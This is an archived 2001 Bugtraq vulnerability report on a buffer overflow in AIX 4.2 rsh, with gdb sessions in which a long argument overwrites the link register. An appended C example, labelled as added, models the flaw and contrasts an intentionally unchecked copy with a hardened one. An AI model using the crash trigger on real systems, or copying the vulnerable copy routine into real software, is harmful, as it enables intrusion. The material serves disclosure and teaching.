[20982] in bugtraq


rsh bufferoverflow on AIX 4.2

daemon@ATHENA.MIT.EDU (ox)
Tue Jun 12 14:54:19 2001

From: "ox" <ymc@iss.com.tw>
To: <bugtraq@securityfocus.com>
Date: Tue, 12 Jun 2001 11:40:20 +0800
Message-ID: <NFBBLJDKGKGPELLLMCNEOELICAAA.ymc@iss.com.tw>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="big5"
Content-Transfer-Encoding: 8bit

Hello bugtraq,

    I am sorry if this problem has been found before. What I found is a buffer overflow in both /usr/bin/rsh and /usr/lpp/ssp/rcmd/bin/rsh.


1. Version description

% oslevel 
4.2.0.0

% uname -a
AIX iss_tw 2 4 000342955700

2. Problem found

/*********************************************************************************************************************/
/*          /usr/lpp/ssp/rcmd/bin/rsh  problem      */
/*         we can easily overflow LR, the register AIX uses to return from a call   */
/*********************************************************************************************************************/
% /usr/local/bin/gdb /usr/lpp/ssp/rcmd/bin/rsh
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (powerpc-ibm-aix4.1.4.0), Copyright 1996 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) set args `perl -e 'print "A" x 300'` a
(gdb) r
Starting program: /usr/lpp/ssp/rcmd/bin/rsh `perl -e 'print "A" x 300'` a
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x61616160 in ?? () from (unknown load module)
(gdb) info register lr
lr             0x61616161       1633771873
(gdb)
/*********************************************************************************************************************/

The other one is:

/*********************************************************************************************************************/
/*         /usr/bin/rsh  problem      */
/*********************************************************************************************************************/
% /usr/local/bin/gdb /usr/bin/rsh
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (powerpc-ibm-aix4.1.4.0), Copyright 1996 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) set args `perl -e 'print "A" x 300'` a
(gdb) r
Starting program: /usr/bin/rsh `perl -e 'print "A" x 300'` a
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x61616160 in ?? () from (unknown load module)
(gdb) info register lr
lr             0x61616161       1633771873
(gdb) 
/*********************************************************************************************************************/


Sincerely yours,


--
Yu-Min Chang
ymc@iss.com.tw
R&D Team, ISS-TW (Internet Security Solutions, Taiwan)
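Added example, not part of the original post and not AIX's rsh code: a C model of the bug class reported above. The rsh source is not shown, so the 64-byte buffer size (HOST_MAX), the lowercasing copy (inferred from the LR bytes reading 0x61, 'a', although the argument was 'A'), and the frame layout with the saved link register stored directly after the buffer are all assumptions of this model. It shows the unchecked copy clobbering the saved LR, the hardened copy rejecting the 300-byte name, and why an LR of 0x61616161 faults at 0x61616160 on PowerPC.

```c
/* Added example, not code from the Bugtraq post or from AIX: a model of the
 * bug class reported above.  The real rsh source is not shown, so the buffer
 * size (HOST_MAX), the lowercasing copy and the frame layout are assumptions. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HOST_MAX 64            /* assumed size of rsh's host-name buffer */

/* Stand-in for the stack: the fixed buffer with the caller's saved link
 * register stored directly after it.  On PowerPC the saved LR sits in the
 * caller's frame just above the callee's locals, so an unbounded copy reaches
 * it the same way; this struct only models that adjacency, not the AIX ABI. */
struct frame {
    char     host[HOST_MAX];
    uint32_t saved_lr;
};

/* Vulnerable pattern: lowercase the name into the buffer with no length check.
 * The copy is capped at the end of the struct so this demonstration itself
 * stays in bounds; the bug being modelled has no such cap.  The lowercasing
 * matches the post, where a 300-byte 'A' argument ends up as 0x61 ('a') in LR. */
static void copy_host_unchecked(struct frame *f, const char *name)
{
    char  *raw = (char *)f;
    size_t cap = sizeof *f;
    size_t i;

    for (i = 0; name[i] != '\0' && i < cap; i++)
        raw[i] = (char)tolower((unsigned char)name[i]);  /* runs past host[] */
    if (i < cap)
        raw[i] = '\0';
}

/* Hardened form: refuse names that do not fit, terminator included, rather
 * than truncating silently and letting a mangled host name through. */
static int copy_host_checked(char *dst, size_t dstsz, const char *name)
{
    size_t n = strlen(name);
    size_t i;

    if (dstsz == 0 || n >= dstsz)
        return -1;
    for (i = 0; i < n; i++)
        dst[i] = (char)tolower((unsigned char)name[i]);
    dst[n] = '\0';
    return 0;
}

/* PowerPC instructions are 4-byte aligned and a branch through LR ignores the
 * low two bits, which is why an LR of 0x61616161 faults at 0x61616160. */
static uint32_t lr_branch_target(uint32_t lr)
{
    return lr & ~(uint32_t)3;
}

/* Build the 300-byte 'A' argument from the post (constructed input). */
static void make_long_name(char *buf, size_t bufsz)
{
    memset(buf, 'A', bufsz - 1);
    buf[bufsz - 1] = '\0';
}

/* Runs the unchecked copy and returns what the saved LR holds afterwards. */
static uint32_t overflow_demo(void)
{
    char         name[301];
    struct frame f;

    make_long_name(name, sizeof name);
    memset(&f, 0, sizeof f);
    f.saved_lr = 0x10001234u;          /* stand-in return address */
    copy_host_unchecked(&f, name);
    return f.saved_lr;
}

/* Runs the checked copy on the same input and on a short mixed-case name;
 * returns 1 if the long name is rejected and the short one is lowercased. */
static int hardened_demo(void)
{
    char name[301];
    char host[HOST_MAX];

    make_long_name(name, sizeof name);
    if (copy_host_checked(host, sizeof host, name) != -1)
        return 0;
    if (copy_host_checked(host, sizeof host, "ISS_TW") != 0)
        return 0;
    return strcmp(host, "iss_tw") == 0;
}

int main(void)
{
    uint32_t lr = overflow_demo();
    printf("saved LR after unchecked copy: 0x%08x, branch target 0x%08x\n",
           lr, lr_branch_target(lr));
    printf("checked copy behaves as expected: %s\n", hardened_demo() ? "yes" : "no");
    return 0;
}
```

The unchecked copy leaves 0x61616161 in the saved link register slot, which after the callee's epilogue becomes the branch target 0x61616160, the same pair of values gdb reports above for both binaries. The checked copy returns -1 for the 300-byte name instead of writing past the buffer; rejecting rather than truncating also avoids handing a silently shortened host name to the rest of the program.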
